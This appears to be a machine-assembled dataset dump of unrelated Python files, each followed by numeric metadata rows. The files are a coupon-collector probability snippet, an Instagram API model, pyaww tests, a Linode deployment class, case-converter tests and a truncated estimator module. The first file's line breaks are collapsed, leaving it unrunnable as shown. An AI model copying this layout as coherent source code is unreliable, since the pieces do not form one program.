"""Python Cookbook See http://www.brynmawr.edu/math/people/anmyers/PAPERS/SIGEST_Coupons.pdf and https://en.wikipedia.org/wiki/Stirling_numbers_of_the_second_kind and https://en.wikipedia.org/wiki/Binomial_coefficient """ from math import factorial def expected(n, population=8): """ What is the probability p(n, d) that exactly n boxes of cereal will have to be purchased in order to obtain, for the first time, a complete collection of at least one of each of the d kinds of souvenir coupons? .. math:: p(n, d) = \frac{d!}{d^n} \lbrace\textstyle{ n-1 \atop d-1 }\rbrace """ return factorial(population)/population**n * stirling2(n-1, population-1) def binom(n, k): """ .. math:: \binom n k = \frac{n!}{k!\,(n-k)!} \quad \text{for }\ 0\leq k\leq n """ return factorial(n)/(factorial(k)*factorial(n-k)) def stirling2(n, k): """ The Stirling numbers of the second kind, written S(n,k) or :math:`\lbrace\textstyle{n\atop k}\rbrace` count the number of ways to partition a set of n labelled objects into k nonempty unlabelled subsets. .. math:: \lbrace\textstyle{n\atop n}\rbrace = 1 \\ \lbrace\textstyle{n\atop 1}\rbrace = 1 \\ \lbrace\textstyle{n\atop k}\rbrace = k \lbrace\textstyle{n-1 \atop k}\rbrace + \lbrace\textstyle{n-1 \atop k-1}\rbrace Or .. math:: \left\{ {n \atop k}\right\} = \frac{1}{k!}\sum_{j=0}^{k} (-1)^{k-j} \binom{k}{j} j^n """ return 1/factorial(k)*sum( (-1 if (k-j)%2 else 1)*binom(k,j)*j**n for j in range(0,k+1) ) if __name__ == "__main__": for i in range(8,30): print(i, expected(i, 8)) print(binom(24,12))
23.833333
126
0.617133
282
1,716
3.698582
0.382979
0.100671
0.107383
0.076702
0.298178
0.233941
0
0
0
0
0
0.0231
0.217949
1,716
71
127
24.169014
0.754098
0.652098
0
0
0
0
0.017505
0
0
0
0
0
0
1
0.272727
false
0
0.090909
0
0.636364
0.181818
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
f9268aeb58281141610970f8e216e6cdeda51607
461
py
Python
instagram_api/response/model/phone_verification_settings.py
Yuego/instagram_api
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
[ "MIT" ]
13
2019-08-07T21:24:34.000Z
2020-12-12T12:23:50.000Z
instagram_api/response/model/phone_verification_settings.py
Yuego/instagram_api
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
[ "MIT" ]
null
null
null
instagram_api/response/model/phone_verification_settings.py
Yuego/instagram_api
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
[ "MIT" ]
null
null
null
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType

__all__ = ['PhoneVerificationSettings', 'PhoneVerificationSettingsInterface']


class PhoneVerificationSettingsInterface(ApiInterfaceBase):
    """Typed field declarations for a phone-verification settings payload.

    NOTE(review): field semantics are inferred from the names only --
    confirm against the actual API response.
    """
    # Seconds before an SMS code may be re-sent -- presumably; verify.
    resend_sms_delay_sec: int
    # Maximum number of SMS codes allowed -- presumably; verify.
    max_sms_count: int
    # Countdown (seconds) before a robocall becomes available -- presumably.
    robocall_count_down_time_sec: int
    # Whether a robocall is offered after the SMS limit -- presumably.
    robocall_after_max_sms: bool


class PhoneVerificationSettings(PropertyMapper, PhoneVerificationSettingsInterface):
    """Concrete response model; PropertyMapper provides attribute mapping."""
    pass
28.8125
84
0.828633
42
461
8.714286
0.595238
0.054645
0
0
0
0
0
0
0
0
0
0
0.114967
461
15
85
30.733333
0.897059
0
0
0
0
0
0.127983
0.127983
0
0
0
0
0
1
0
false
0.1
0.2
0
0.8
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
f926af6496049e7c9e88d6030f7d6842224bd386
791
py
Python
tests/submodules/test_always_on_task.py
MatiCG/pyaww
fa93184d96963b5ca2cb0330cec3a34a4fe423f7
[ "MIT" ]
null
null
null
tests/submodules/test_always_on_task.py
MatiCG/pyaww
fa93184d96963b5ca2cb0330cec3a34a4fe423f7
[ "MIT" ]
null
null
null
tests/submodules/test_always_on_task.py
MatiCG/pyaww
fa93184d96963b5ca2cb0330cec3a34a4fe423f7
[ "MIT" ]
null
null
null
# Standard library imports from typing import TYPE_CHECKING # Related third party imports import pytest # Local application/library specific imports if TYPE_CHECKING: from pyaww import AlwaysOnTask, User @pytest.mark.asyncio async def test_restart(always_on_task: "AlwaysOnTask") -> None: assert await always_on_task.restart() is None @pytest.mark.asyncio async def test_get_always_on_task_by_id( client: "User", always_on_task: "AlwaysOnTask" ) -> None: assert await client.get_always_on_task_by_id(always_on_task.id) == always_on_task @pytest.mark.asyncio async def test_update(always_on_task: "AlwaysOnTask") -> None: await always_on_task.update(description="A") await always_on_task.update(description="B") assert always_on_task.description == "B"
24.71875
85
0.774968
114
791
5.087719
0.350877
0.151724
0.227586
0.113793
0.515517
0.467241
0.134483
0
0
0
0
0
0.1378
791
31
86
25.516129
0.85044
0.120101
0
0.176471
0
0
0.062139
0
0
0
0
0
0.176471
1
0
true
0
0.176471
0
0.176471
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
f92b6b4fadb3ff08ff50008fabfc5374c47c9147
688
py
Python
speedydeploy/providers/linode.py
suvit/speedydeploy
124d7723f9e5935935f97bd3b1e433cfd251084d
[ "MIT" ]
null
null
null
speedydeploy/providers/linode.py
suvit/speedydeploy
124d7723f9e5935935f97bd3b1e433cfd251084d
[ "MIT" ]
null
null
null
speedydeploy/providers/linode.py
suvit/speedydeploy
124d7723f9e5935935f97bd3b1e433cfd251084d
[ "MIT" ]
null
null
null
from fabric import api as fab

from ..base import Ubuntu, Ubuntu104
from ..deployment import _
from ..project.cron import CronTab
from ..project import LogRotate

from .base import Provider


class Linode(Provider):
    """Deployment provider for Linode hosts.

    Populates the shared fabric environment (fab.env) with the OS
    flavour, home/remote paths, and cron/logrotate helpers used by the
    rest of the deployment code.
    """

    def __init__(self):
        super(Linode, self).__init__()
        # NOTE(review): Ubuntu104 presumably pins the Ubuntu 10.04 image
        # these hosts run -- confirm in ..base.
        fab.env.os = Ubuntu104()
        # Both paths use the same template; "_" presumably defers
        # %(user)s interpolation to fab.env -- confirm in ..deployment.
        fab.env.remote_dir = _("/home/%(user)s/")
        fab.env.home_dir = _("/home/%(user)s/")
        fab.env.cron = CronTab()
        fab.env.logrotate = LogRotate()


class Linode512(Linode):
    # OLD -- presumably a legacy plan-size alias; see Linode1 below.
    pass


class Linode768(Linode):
    # OLD -- legacy plan-size alias with no distinct behavior.
    pass


class Linode1024(Linode):
    # OLD -- presumably a legacy plan-size alias; see Linode2 below.
    pass


class Linode1(Linode512):
    pass


class Linode2(Linode1024):
    pass
16.380952
49
0.651163
86
688
5.05814
0.406977
0.068966
0.089655
0.124138
0.082759
0.082759
0
0
0
0
0
0.04717
0.229651
688
41
50
16.780488
0.773585
0.015988
0
0.208333
0
0
0.044577
0
0
0
0
0
0
1
0.041667
false
0.208333
0.25
0
0.541667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
f92cef77139ea8064b596a73f936a9a1cd5b8f66
19,501
py
Python
CaseConverter/test.py
SylannBin/Utils
b4caa6366f7e6a8fcb70ec7a4b3f180b18418689
[ "MIT" ]
null
null
null
CaseConverter/test.py
SylannBin/Utils
b4caa6366f7e6a8fcb70ec7a4b3f180b18418689
[ "MIT" ]
null
null
null
CaseConverter/test.py
SylannBin/Utils
b4caa6366f7e6a8fcb70ec7a4b3f180b18418689
[ "MIT" ]
null
null
null
from printer import Color, danger, success, info, format_table from converter import * def resolve(function, value, expected): try: result = function(value) except ValueError as e: result = 'ValueError' except NotImplementedError as e: return e.message, Color.BLUE if result == expected: return result, Color.GREEN return result, Color.RED def execute(tests): for i, line in enumerate(tests): result, state_code = resolve(line[0], line[1], line[2]) tests[i] = [line[0].__name__, line[1], line[2], result, state_code] def repport(tests, index): errors = 0 ok = 0 missing = 0 for line in tests: if line[index] == 0: errors += 1 elif line[index] == 1: ok += 1 elif line[index] == 3: missing += 1 print "Repport:\n" print "- {:>12} Methods not yet implemented".format(info(missing)) print "- {:>12} Methods failing".format(danger(errors)) print "- {:>12} Methods doing ok".format(success(ok)) print values = [ 'ThisWasPascal', 'thisWasCamel', 'this_was_snake', 'THIS_WAS_COBOL', 'This_Was_Weird', 'this-was-kebab', 'THIS-WAS-TRAIN', 'This-Was-Weird', 'this has spaces', 'this-IsInvalid', 'This_IsInvalid' ] tests = [ [camel_to_cobol, 'ThisWasPascal', 'ValueError'], [camel_to_kebab, 'ThisWasPascal', 'ValueError'], [camel_to_pascal, 'ThisWasPascal', 'ValueError'], [camel_to_snake, 'ThisWasPascal', 'ValueError'], [camel_to_train, 'ThisWasPascal', 'ValueError'], [cobol_to_camel, 'ThisWasPascal', 'ValueError'], [cobol_to_kebab, 'ThisWasPascal', 'ValueError'], [cobol_to_pascal, 'ThisWasPascal', 'ValueError'], [cobol_to_snake, 'ThisWasPascal', 'ValueError'], [cobol_to_train, 'ThisWasPascal', 'ValueError'], [kebab_to_camel, 'ThisWasPascal', 'ValueError'], [kebab_to_cobol, 'ThisWasPascal', 'ValueError'], [kebab_to_pascal, 'ThisWasPascal', 'ValueError'], [kebab_to_snake, 'ThisWasPascal', 'ValueError'], [kebab_to_train, 'ThisWasPascal', 'ValueError'], [pascal_to_camel, 'ThisWasPascal', 'thisWasPascal'], [pascal_to_cobol, 'ThisWasPascal', 'THIS_WAS_PASCAL'], [pascal_to_kebab, 'ThisWasPascal', 
'this-was-pascal'], [pascal_to_snake, 'ThisWasPascal', 'this_was_pascal'], [pascal_to_train, 'ThisWasPascal', 'THIS-WAS-PASCAL'], [snake_to_camel, 'ThisWasPascal', 'ValueError'], [snake_to_cobol, 'ThisWasPascal', 'ValueError'], [snake_to_kebab, 'ThisWasPascal', 'ValueError'], [snake_to_pascal, 'ThisWasPascal', 'ValueError'], [snake_to_train, 'ThisWasPascal', 'ValueError'], [train_to_camel, 'ThisWasPascal', 'ValueError'], [train_to_cobol, 'ThisWasPascal', 'ValueError'], [train_to_kebab, 'ThisWasPascal', 'ValueError'], [train_to_pascal, 'ThisWasPascal', 'ValueError'], [train_to_snake, 'ThisWasPascal', 'ValueError'], [camel_to_cobol, 'thisWasCamel', 'THIS_WAS_CAMEL'], [camel_to_kebab, 'thisWasCamel', 'this-was-camel'], [camel_to_pascal, 'thisWasCamel', 'ThisWasCamel'], [camel_to_snake, 'thisWasCamel', 'this_was_camel'], [camel_to_train, 'thisWasCamel', 'THIS-WAS-CAMEL'], [cobol_to_camel, 'thisWasCamel', 'ValueError'], [cobol_to_kebab, 'thisWasCamel', 'ValueError'], [cobol_to_pascal, 'thisWasCamel', 'ValueError'], [cobol_to_snake, 'thisWasCamel', 'ValueError'], [cobol_to_train, 'thisWasCamel', 'ValueError'], [kebab_to_camel, 'thisWasCamel', 'ValueError'], [kebab_to_cobol, 'thisWasCamel', 'ValueError'], [kebab_to_pascal, 'thisWasCamel', 'ValueError'], [kebab_to_snake, 'thisWasCamel', 'ValueError'], [kebab_to_train, 'thisWasCamel', 'ValueError'], [pascal_to_camel, 'thisWasCamel', 'ValueError'], [pascal_to_cobol, 'thisWasCamel', 'ValueError'], [pascal_to_kebab, 'thisWasCamel', 'ValueError'], [pascal_to_snake, 'thisWasCamel', 'ValueError'], [pascal_to_train, 'thisWasCamel', 'ValueError'], [snake_to_camel, 'thisWasCamel', 'ValueError'], [snake_to_cobol, 'thisWasCamel', 'ValueError'], [snake_to_kebab, 'thisWasCamel', 'ValueError'], [snake_to_pascal, 'thisWasCamel', 'ValueError'], [snake_to_train, 'thisWasCamel', 'ValueError'], [train_to_camel, 'thisWasCamel', 'ValueError'], [train_to_cobol, 'thisWasCamel', 'ValueError'], [train_to_kebab, 'thisWasCamel', 'ValueError'], 
[train_to_pascal, 'thisWasCamel', 'ValueError'], [train_to_snake, 'thisWasCamel', 'ValueError'], [camel_to_cobol, 'this_was_snake', 'ValueError'], [camel_to_kebab, 'this_was_snake', 'ValueError'], [camel_to_pascal, 'this_was_snake', 'ValueError'], [camel_to_snake, 'this_was_snake', 'ValueError'], [camel_to_train, 'this_was_snake', 'ValueError'], [cobol_to_camel, 'this_was_snake', 'ValueError'], [cobol_to_kebab, 'this_was_snake', 'ValueError'], [cobol_to_pascal, 'this_was_snake', 'ValueError'], [cobol_to_snake, 'this_was_snake', 'ValueError'], [cobol_to_train, 'this_was_snake', 'ValueError'], [kebab_to_camel, 'this_was_snake', 'ValueError'], [kebab_to_cobol, 'this_was_snake', 'ValueError'], [kebab_to_pascal, 'this_was_snake', 'ValueError'], [kebab_to_snake, 'this_was_snake', 'ValueError'], [kebab_to_train, 'this_was_snake', 'ValueError'], [pascal_to_camel, 'this_was_snake', 'ValueError'], [pascal_to_cobol, 'this_was_snake', 'ValueError'], [pascal_to_kebab, 'this_was_snake', 'ValueError'], [pascal_to_snake, 'this_was_snake', 'ValueError'], [pascal_to_train, 'this_was_snake', 'ValueError'], [snake_to_camel, 'this_was_snake', 'thisWasSnake'], [snake_to_cobol, 'this_was_snake', 'THIS_WAS_SNAKE'], [snake_to_kebab, 'this_was_snake', 'this-was-snake'], [snake_to_pascal, 'this_was_snake', 'ThisWasSnake'], [snake_to_train, 'this_was_snake', 'THIS-WAS-SNAKE'], [train_to_camel, 'this_was_snake', 'ValueError'], [train_to_cobol, 'this_was_snake', 'ValueError'], [train_to_kebab, 'this_was_snake', 'ValueError'], [train_to_pascal, 'this_was_snake', 'ValueError'], [train_to_snake, 'this_was_snake', 'ValueError'], [camel_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_train, 'THIS_WAS_COBOL', 'ValueError'], [cobol_to_camel, 'THIS_WAS_COBOL', 'thisWasCobol'], [cobol_to_kebab, 'THIS_WAS_COBOL', 'this-was-cobol'], [cobol_to_pascal, 
'THIS_WAS_COBOL', 'ThisWasCobol'], [cobol_to_snake, 'THIS_WAS_COBOL', 'this_was_cobol'], [cobol_to_train, 'THIS_WAS_COBOL', 'THIS-WAS-COBOL'], [kebab_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_train, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_train, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_train, 'THIS_WAS_COBOL', 'ValueError'], [train_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [train_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [train_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [train_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [train_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_cobol, 'This_Was_Weird', 'ValueError'], [camel_to_kebab, 'This_Was_Weird', 'ValueError'], [camel_to_pascal, 'This_Was_Weird', 'ValueError'], [camel_to_snake, 'This_Was_Weird', 'ValueError'], [camel_to_train, 'This_Was_Weird', 'ValueError'], [cobol_to_camel, 'This_Was_Weird', 'ValueError'], [cobol_to_kebab, 'This_Was_Weird', 'ValueError'], [cobol_to_pascal, 'This_Was_Weird', 'ValueError'], [cobol_to_snake, 'This_Was_Weird', 'ValueError'], [cobol_to_train, 'This_Was_Weird', 'ValueError'], [kebab_to_camel, 'This_Was_Weird', 'ValueError'], [kebab_to_cobol, 'This_Was_Weird', 'ValueError'], [kebab_to_pascal, 'This_Was_Weird', 'ValueError'], [kebab_to_snake, 'This_Was_Weird', 'ValueError'], [kebab_to_train, 'This_Was_Weird', 'ValueError'], [pascal_to_camel, 'This_Was_Weird', 'ValueError'], [pascal_to_cobol, 'This_Was_Weird', 
'ValueError'], [pascal_to_kebab, 'This_Was_Weird', 'ValueError'], [pascal_to_snake, 'This_Was_Weird', 'ValueError'], [pascal_to_train, 'This_Was_Weird', 'ValueError'], [snake_to_camel, 'This_Was_Weird', 'ValueError'], [snake_to_cobol, 'This_Was_Weird', 'ValueError'], [snake_to_kebab, 'This_Was_Weird', 'ValueError'], [snake_to_pascal, 'This_Was_Weird', 'ValueError'], [snake_to_train, 'This_Was_Weird', 'ValueError'], [train_to_camel, 'This_Was_Weird', 'ValueError'], [train_to_cobol, 'This_Was_Weird', 'ValueError'], [train_to_kebab, 'This_Was_Weird', 'ValueError'], [train_to_pascal, 'This_Was_Weird', 'ValueError'], [train_to_snake, 'This_Was_Weird', 'ValueError'], [camel_to_cobol, 'this-was-kebab', 'ValueError'], [camel_to_kebab, 'this-was-kebab', 'ValueError'], [camel_to_pascal, 'this-was-kebab', 'ValueError'], [camel_to_snake, 'this-was-kebab', 'ValueError'], [camel_to_train, 'this-was-kebab', 'ValueError'], [cobol_to_camel, 'this-was-kebab', 'ValueError'], [cobol_to_kebab, 'this-was-kebab', 'ValueError'], [cobol_to_pascal, 'this-was-kebab', 'ValueError'], [cobol_to_snake, 'this-was-kebab', 'ValueError'], [cobol_to_train, 'this-was-kebab', 'ValueError'], [kebab_to_camel, 'this-was-kebab', 'thisWasKebab'], [kebab_to_cobol, 'this-was-kebab', 'THIS_WAS_KEBAB'], [kebab_to_pascal, 'this-was-kebab', 'ThisWasKebab'], [kebab_to_snake, 'this-was-kebab', 'this_was_kebab'], [kebab_to_train, 'this-was-kebab', 'THIS-WAS-KEBAB'], [pascal_to_camel, 'this-was-kebab', 'ValueError'], [pascal_to_cobol, 'this-was-kebab', 'ValueError'], [pascal_to_kebab, 'this-was-kebab', 'ValueError'], [pascal_to_snake, 'this-was-kebab', 'ValueError'], [pascal_to_train, 'this-was-kebab', 'ValueError'], [snake_to_camel, 'this-was-kebab', 'ValueError'], [snake_to_cobol, 'this-was-kebab', 'ValueError'], [snake_to_kebab, 'this-was-kebab', 'ValueError'], [snake_to_pascal, 'this-was-kebab', 'ValueError'], [snake_to_train, 'this-was-kebab', 'ValueError'], [train_to_camel, 'this-was-kebab', 'ValueError'], 
[train_to_cobol, 'this-was-kebab', 'ValueError'], [train_to_kebab, 'this-was-kebab', 'ValueError'], [train_to_pascal, 'this-was-kebab', 'ValueError'], [train_to_snake, 'this-was-kebab', 'ValueError'], [camel_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [train_to_camel, 'THIS-WAS-TRAIN', 'thisWasTrain'], [train_to_cobol, 'THIS-WAS-TRAIN', 'THIS_WAS_TRAIN'], [train_to_kebab, 'THIS-WAS-TRAIN', 'this-was-train'], [train_to_pascal, 'THIS-WAS-TRAIN', 'ThisWasTrain'], [train_to_snake, 'THIS-WAS-TRAIN', 'this_was_train'], [camel_to_cobol, 'This-Was-Weird', 'ValueError'], [camel_to_kebab, 'This-Was-Weird', 'ValueError'], [camel_to_pascal, 'This-Was-Weird', 'ValueError'], [camel_to_snake, 'This-Was-Weird', 'ValueError'], [camel_to_train, 'This-Was-Weird', 'ValueError'], [cobol_to_camel, 
'This-Was-Weird', 'ValueError'], [cobol_to_kebab, 'This-Was-Weird', 'ValueError'], [cobol_to_pascal, 'This-Was-Weird', 'ValueError'], [cobol_to_snake, 'This-Was-Weird', 'ValueError'], [cobol_to_train, 'This-Was-Weird', 'ValueError'], [kebab_to_camel, 'This-Was-Weird', 'ValueError'], [kebab_to_cobol, 'This-Was-Weird', 'ValueError'], [kebab_to_pascal, 'This-Was-Weird', 'ValueError'], [kebab_to_snake, 'This-Was-Weird', 'ValueError'], [kebab_to_train, 'This-Was-Weird', 'ValueError'], [pascal_to_camel, 'This-Was-Weird', 'ValueError'], [pascal_to_cobol, 'This-Was-Weird', 'ValueError'], [pascal_to_kebab, 'This-Was-Weird', 'ValueError'], [pascal_to_snake, 'This-Was-Weird', 'ValueError'], [pascal_to_train, 'This-Was-Weird', 'ValueError'], [snake_to_camel, 'This-Was-Weird', 'ValueError'], [snake_to_cobol, 'This-Was-Weird', 'ValueError'], [snake_to_kebab, 'This-Was-Weird', 'ValueError'], [snake_to_pascal, 'This-Was-Weird', 'ValueError'], [snake_to_train, 'This-Was-Weird', 'ValueError'], [train_to_camel, 'This-Was-Weird', 'ValueError'], [train_to_cobol, 'This-Was-Weird', 'ValueError'], [train_to_kebab, 'This-Was-Weird', 'ValueError'], [train_to_pascal, 'This-Was-Weird', 'ValueError'], [train_to_snake, 'This-Was-Weird', 'ValueError'], [camel_to_cobol, 'this has spaces', 'ValueError'], [camel_to_kebab, 'this has spaces', 'ValueError'], [camel_to_pascal, 'this has spaces', 'ValueError'], [camel_to_snake, 'this has spaces', 'ValueError'], [camel_to_train, 'this has spaces', 'ValueError'], [cobol_to_camel, 'this has spaces', 'ValueError'], [cobol_to_kebab, 'this has spaces', 'ValueError'], [cobol_to_pascal, 'this has spaces', 'ValueError'], [cobol_to_snake, 'this has spaces', 'ValueError'], [cobol_to_train, 'this has spaces', 'ValueError'], [kebab_to_camel, 'this has spaces', 'ValueError'], [kebab_to_cobol, 'this has spaces', 'ValueError'], [kebab_to_pascal, 'this has spaces', 'ValueError'], [kebab_to_snake, 'this has spaces', 'ValueError'], [kebab_to_train, 'this has spaces', 
'ValueError'], [pascal_to_camel, 'this has spaces', 'ValueError'], [pascal_to_cobol, 'this has spaces', 'ValueError'], [pascal_to_kebab, 'this has spaces', 'ValueError'], [pascal_to_snake, 'this has spaces', 'ValueError'], [pascal_to_train, 'this has spaces', 'ValueError'], [snake_to_camel, 'this has spaces', 'ValueError'], [snake_to_cobol, 'this has spaces', 'ValueError'], [snake_to_kebab, 'this has spaces', 'ValueError'], [snake_to_pascal, 'this has spaces', 'ValueError'], [snake_to_train, 'this has spaces', 'ValueError'], [train_to_camel, 'this has spaces', 'ValueError'], [train_to_cobol, 'this has spaces', 'ValueError'], [train_to_kebab, 'this has spaces', 'ValueError'], [train_to_pascal, 'this has spaces', 'ValueError'], [train_to_snake, 'this has spaces', 'ValueError'], [camel_to_cobol, 'this-IsInvalid', 'ValueError'], [camel_to_kebab, 'this-IsInvalid', 'ValueError'], [camel_to_pascal, 'this-IsInvalid', 'ValueError'], [camel_to_snake, 'this-IsInvalid', 'ValueError'], [camel_to_train, 'this-IsInvalid', 'ValueError'], [cobol_to_camel, 'this-IsInvalid', 'ValueError'], [cobol_to_kebab, 'this-IsInvalid', 'ValueError'], [cobol_to_pascal, 'this-IsInvalid', 'ValueError'], [cobol_to_snake, 'this-IsInvalid', 'ValueError'], [cobol_to_train, 'this-IsInvalid', 'ValueError'], [kebab_to_camel, 'this-IsInvalid', 'ValueError'], [kebab_to_cobol, 'this-IsInvalid', 'ValueError'], [kebab_to_pascal, 'this-IsInvalid', 'ValueError'], [kebab_to_snake, 'this-IsInvalid', 'ValueError'], [kebab_to_train, 'this-IsInvalid', 'ValueError'], [pascal_to_camel, 'this-IsInvalid', 'ValueError'], [pascal_to_cobol, 'this-IsInvalid', 'ValueError'], [pascal_to_kebab, 'this-IsInvalid', 'ValueError'], [pascal_to_snake, 'this-IsInvalid', 'ValueError'], [pascal_to_train, 'this-IsInvalid', 'ValueError'], [snake_to_camel, 'this-IsInvalid', 'ValueError'], [snake_to_cobol, 'this-IsInvalid', 'ValueError'], [snake_to_kebab, 'this-IsInvalid', 'ValueError'], [snake_to_pascal, 'this-IsInvalid', 'ValueError'], 
[snake_to_train, 'this-IsInvalid', 'ValueError'], [train_to_camel, 'this-IsInvalid', 'ValueError'], [train_to_cobol, 'this-IsInvalid', 'ValueError'], [train_to_kebab, 'this-IsInvalid', 'ValueError'], [train_to_pascal, 'this-IsInvalid', 'ValueError'], [train_to_snake, 'this-IsInvalid', 'ValueError'], [camel_to_cobol, 'This_IsInvalid', 'ValueError'], [camel_to_kebab, 'This_IsInvalid', 'ValueError'], [camel_to_pascal, 'This_IsInvalid', 'ValueError'], [camel_to_snake, 'This_IsInvalid', 'ValueError'], [camel_to_train, 'This_IsInvalid', 'ValueError'], [cobol_to_camel, 'This_IsInvalid', 'ValueError'], [cobol_to_kebab, 'This_IsInvalid', 'ValueError'], [cobol_to_pascal, 'This_IsInvalid', 'ValueError'], [cobol_to_snake, 'This_IsInvalid', 'ValueError'], [cobol_to_train, 'This_IsInvalid', 'ValueError'], [kebab_to_camel, 'This_IsInvalid', 'ValueError'], [kebab_to_cobol, 'This_IsInvalid', 'ValueError'], [kebab_to_pascal, 'This_IsInvalid', 'ValueError'], [kebab_to_snake, 'This_IsInvalid', 'ValueError'], [kebab_to_train, 'This_IsInvalid', 'ValueError'], [pascal_to_camel, 'This_IsInvalid', 'ValueError'], [pascal_to_cobol, 'This_IsInvalid', 'ValueError'], [pascal_to_kebab, 'This_IsInvalid', 'ValueError'], [pascal_to_snake, 'This_IsInvalid', 'ValueError'], [pascal_to_train, 'This_IsInvalid', 'ValueError'], [snake_to_camel, 'This_IsInvalid', 'ValueError'], [snake_to_cobol, 'This_IsInvalid', 'ValueError'], [snake_to_kebab, 'This_IsInvalid', 'ValueError'], [snake_to_pascal, 'This_IsInvalid', 'ValueError'], [snake_to_train, 'This_IsInvalid', 'ValueError'], [train_to_camel, 'This_IsInvalid', 'ValueError'], [train_to_cobol, 'This_IsInvalid', 'ValueError'], [train_to_kebab, 'This_IsInvalid', 'ValueError'], [train_to_pascal, 'This_IsInvalid', 'ValueError'], [train_to_snake, 'This_IsInvalid', 'ValueError'], ] executed_tests = execute(tests) tests.insert(0, ['Method', 'Input', 'Expected', 'Output', Color.BOLD]) color_index = 4 format_table(tests, color_index) repport(tests, color_index)
48.50995
75
0.68376
2,362
19,501
5.260373
0.035563
0.116056
0.059879
0.106237
0.783984
0.775614
0.381167
0.381167
0.339799
0.339799
0
0.001374
0.141531
19,501
402
76
48.50995
0.740816
0
0
0
0
0
0.42288
0
0
0
0
0
0
0
null
null
0
0.005236
null
null
0.015707
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
00598c2daee80da81e11b29c14b4a24630b9dc0c
4,933
py
Python
candle/estimator.py
paiforsyth/candle
831da9f92ee6e2bdb86cb0ddc7faedd4ff9d12d9
[ "MIT" ]
null
null
null
candle/estimator.py
paiforsyth/candle
831da9f92ee6e2bdb86cb0ddc7faedd4ff9d12d9
[ "MIT" ]
null
null
null
candle/estimator.py
paiforsyth/candle
831da9f92ee6e2bdb86cb0ddc7faedd4ff9d12d9
[ "MIT" ]
null
null
null
import gc

from torch.autograd import Variable
import torch
import torch.autograd as ag
import torch.nn as nn
import torch.nn.functional as F
import numpy as np

from .context import Context
from .nested import *


class Function(object):
    """Abstract callable object; subclasses implement ``__call__``."""

    def __call__(self, *args, **kwargs):
        raise NotImplementedError


class RebarFunction(Function):
    """Wraps a function so it is evaluated on a Concrete (temperature)
    relaxation of its input, as used by the REBAR estimator."""

    def __init__(self, function, temp):
        self.function = function
        self.temp = temp
        self.concrete_fn = ConcreteRelaxation(temp)

    def __call__(self, theta, noise):
        # NOTE(review): `noise` is accepted but never used here — confirm
        # whether callers rely on this signature before removing it.
        return self.function(self.concrete_fn(theta))


